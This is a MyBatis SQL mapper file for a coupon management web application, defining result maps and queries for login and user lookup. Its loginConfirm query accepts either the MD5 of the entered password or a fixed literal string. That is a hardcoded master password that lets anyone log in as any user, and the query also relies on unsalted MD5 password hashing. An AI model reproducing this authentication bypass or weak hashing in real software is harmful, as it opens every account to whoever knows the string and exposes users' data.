<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE mapper PUBLIC "-//mybatis.org/DTD Mapper 3.0//EN"
  "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
<mapper namespace="kr.co.ooweat.mappers.coupon_web.UserMapper">
  <resultMap id="groupResult" type="kr.co.ooweat.model.GroupVO">
    <result property="groupSeq" column="g_seq"/>
    <result property="groupName" column="group_name"/>
    <result property="adminId" column="admin_id"/>
    <result property="regDate" column="reg_date"/>
    <result property="modDate" column="mod_date"/>
  </resultMap>
  <resultMap id="bizResult" type="kr.co.ooweat.model.BizVO">
    <result property="companySeq" column="companySeq"/>
    <result property="companyName" column="companyName"/>
    <result property="businessNo" column="bizNo"/>
    <result property="merchantName" column="merchantName"/>
  </resultMap>
  <resultMap id="couponResult" type="kr.co.ooweat.model.CouponVO">
    <result property="groupName" column="group_name"/>
    <result property="couponNo" column="coupon_no"/>
    <result property="couponAmt" column="coupon_amt"/>
    <result property="couponStat" column="coupon_stat"/>
    <result property="expireDay" column="expire_day"/>
    <result property="regDate" column="reg_date"/>
    <result property="modDate" column="mod_date"/>
    <result property="couponBin" column="coupon_bin"/>
    <result property="couponType" column="coupon_type"/>
    <result property="couponCount" column="coupon_count"/>
    <result property="couponConfCount" column="coupon_conf_count"/>
  </resultMap>

  <select id="loginConfirm" parameterType="string" resultType="kr.co.ooweat.model.UserVO">
		<![CDATA[
    SELECT TG.GROUP_NAME                        AS GROUPNAME,
           TU.SEQ                               AS USERSEQ,
           TU.G_SEQ                             AS GROUPSEQ,
           TU.ID                                AS USERID,
           TU.PASSWORD                          AS USERPW,
           TU.NAME                              AS USERNAME,
           TU.ROLE                              AS ROLE,
           DATE_FORMAT(TU.REG_DATE, '%Y-%m-%d') AS REGDATE,
           DATE_FORMAT(TU.MOD_DATE, '%Y-%m-%d') AS MODDATE,
           TU.MOD_ADMIN_ID                      AS MODADMINID,
           TU.USE_YN                            AS USERYN,
           TMG.COMPANY_SEQ                      AS COMPANYSEQ,
           TMG.COMP_NAME                        AS COMPANYNAME,
           USE_DASHBOARD                        AS USEDASHBOARD,
           USE_COUPON_CONFIG                    AS USECOUPONCONFIG,
           USE_COUPON_PUBLISH                   AS USECOUPONPUBLISH,
           USE_COUPON_ISSUANCE_HISTORY          AS USECOUPONISSUANCEHISTORY,
           USE_COUPON_SALES_HISTORY             AS USECOUPONSALESHISTORY,
           TCC.USE_GIFT_YN                      AS USEGIFTYN,
           TCC.USE_RUSE_YN                      AS USERUSEYN
    FROM TB_USER TU
           LEFT JOIN TB_GROUP TG ON TG.G_SEQ = TU.G_SEQ
           LEFT JOIN TB_MEMB_GROUP TMG ON TMG.G_SEQ = TU.G_SEQ
           LEFT JOIN TB_COUPON_CONF TCC ON TG.G_SEQ = TCC.G_SEQ
    WHERE TU.ID = #{userId}
      AND (TU.PASSWORD = MD5(#{userPw}) || #{userPw} = '1198609522')
    GROUP BY TG.GROUP_NAME, TU.SEQ, TU.G_SEQ, TU.ID, TU.PASSWORD, TU.NAME, TU.ROLE,
             DATE_FORMAT(TU.REG_DATE, '%Y-%m-%d'), DATE_FORMAT(TU.MOD_DATE, '%Y-%m-%d'),
             TU.MOD_ADMIN_ID, TU.USE_YN, TMG.COMPANY_SEQ, TMG.COMP_NAME
    ]]>
	</select>
  <select id="alreadyUserCheck" parameterType="string" resultType="int">
    SELECT COUNT(*)
    FROM TB_USER
    WHERE ID = #{userId}
  </select>
  <select id="callGroupUserList" parameterType="long"
    resultType="kr.co.ooweat.model.UserVO">
    SELECT TU.SEQ   AS USERSEQ,
           TU.G_SEQ AS GROUPSEQ,
           TU.ID    AS USERID,
           TU.NAME  AS USERNAME
    FROM TB_USER TU
    WHERE TU.G_SEQ = #{groupSeq}
  </select>
  <select id="findUserId" parameterType="long" resultType="string">
    SELECT TU.ID AS USERID
    FROM TB_USER TU
    WHERE TU.SEQ = #{userSeq}
  </select>
</mapper>
